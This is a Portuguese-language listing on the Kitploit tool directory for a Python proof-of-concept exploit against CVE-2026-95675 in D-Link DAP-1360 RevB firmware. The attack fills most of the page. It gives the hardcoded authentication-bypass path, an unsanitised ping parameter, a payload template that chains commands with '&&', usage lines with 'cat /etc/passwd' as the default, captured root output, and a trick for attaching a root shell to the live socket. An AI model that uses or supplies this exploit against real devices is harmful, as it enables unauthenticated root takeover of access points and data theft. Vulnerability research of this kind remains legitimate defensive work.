Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-95675 — PoC em Python explorando a CVE-2026-95675, uma injeção de comando root não autenticada no firmware do D-Link DAP-1360 RevB por meio de um bypass de autenticação codificado e do manipulador formSystemCheck. | Kitploit
Ferramentas/GitHubGitHub/d6fault/cve-2026-95675
Segurança de Sistemas EmbarcadosSegurança IoTAnálise de VulnerabilidadesExploraçãoEngenharia ReversaExploração de Aplicações WebSegurança de Hardware e IoTFerramenta de Acesso RemotoAnálise de Firmware
GitHubd6fault/cve-2026-95675

CVE-2026-95675

12há 9h 53mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC em Python explorando a CVE-2026-95675, uma injeção de comando root não autenticada no firmware do D-Link DAP-1360 RevB por meio de um bypass de autenticação codificado e do manipulador formSystemCheck.

Ver Repositório

CVE-2026-95675 — D-Link DAP-1360 RevB

Execução remota de comandos como root sem autenticação (CWE-78 — Injeção de Comandos do SO) no manipulador formSystemCheck, acessível através de um backdoor de autenticação embutido no código. Verificado contra DAP-1360 RevB, firmware 2.14B05.

Causa Raiz

Dois problemas independentes encadeados:

1. Caminho de bypass de autenticação embutido. Em main (httpd @ 0x4064c8):

root@kitploit:~
strcasecmp(request_path, "dEfWzDLOgIn")   ; token @ 0x48046c
  ...
  sw 1, 8(sp_login_slot)                  ; mark this source-IP as logged in

GET /dEfWzDLOgIn retorna 404 (não é um arquivo real), mas, como efeito colateral, marca o slot de sessão do IP de origem solicitante como autenticado — sem necessidade de nome de usuário, senha ou captcha.

2. Injeção de comando do SO. formSystemCheck (POST /apply.cgi?formSystemCheck) constrói um comando shell com:

root@kitploit:~
_system("ping %s -c 2 >/tmp/test_ping", cgi("ipv4_ping"))

ipv4_ping é passado sem sanitização para a string de formato; _system() usa vsprintf em um buffer de pilha de tamanho fixo e o entrega a system(). O manipulador não realiza verificação de autenticação própria.

Ressalva do parser

O parser de corpo POST do busybox remove ;, |, crase e nova linha, mas && sobrevive. Um payload deve terminar o prefixo ping e então encadear com &&, por exemplo:

root@kitploit:~
127.0.0.1 -c 1 && <command> > /www/out.htm && x

Uso

root@kitploit:~
python3 autopoc.py <target> [command]

python3 autopoc.py 192.168.0.50
python3 autopoc.py 192.168.0.50 "ls -la /"
ArgDescrição
targethost/IP alvo (esquema padrão http://)
command (opcional)comando root a executar (padrão: cat /etc/passwd); use , não /`

Como funciona

  1. GET /dEfWzDLOgIn — dispara o bypass de autenticação embutido (retorna 404; o efeito colateral ocorre no lado do servidor).
  2. POST /apply.cgi?formSystemCheck com ipv4_ping=127.0.0.1 -c 1 && <cmd> > /www/<OUT> && x — injeção de comando como root.
  3. GET /<OUT> — recupera a saída do comando (o httpd serve .htm/.html, não .txt).

Saída

root@kitploit:~
[*] target   : 192.168.0.50
[*] command  : cat /etc/passwd
[*] GET /dEfWzDLOgIn -> 404 (login slot flagged)
[*] POST /apply.cgi?formSystemCheck -> 302
[+] output (RCE.htm):
------------------------------------------------------------
root:x:0:0:root:/:/dev/null
nobody:x:0:0:nobody:/:/dev/null
------------------------------------------------------------

Notas / limitações

  • O busybox do dispositivo não possui nc, wget, base64, chmod, id — use cat, echo, ls, cp, etc.
  • A saída é gravada no docroot com permissão de escrita global e obtida via HTTP (nenhum listener necessário).
  • Para um shell interativo, o processo injetado herda o socket do cliente como fd 5; combinado com o httpd adiando a resposta até que _system() retorne, sh <&5 >&5 2>&5 pode anexar um shell à conexão ativa (frágil sob QEMU em modo usuário; melhor em hardware real).
  • Não aplicável ao DAP-1360 RevC1 / firmware 3.00 ou às builds "D-Link Russia" DIR/xDSL — endpoints, docroot e parser diferentes. Esses exigem análise separada.

Exposição

O Shodan ("CAMEO-httpd", o banner do fornecedor do httpd) mostra apenas um pequeno número de instâncias expostas à internet dessa base de código exata; o dispositivo é primariamente um ponto de acesso do lado da LAN. A exploração requer alcançabilidade da interface de gerenciamento web.

Baixar ferramenta
&&
;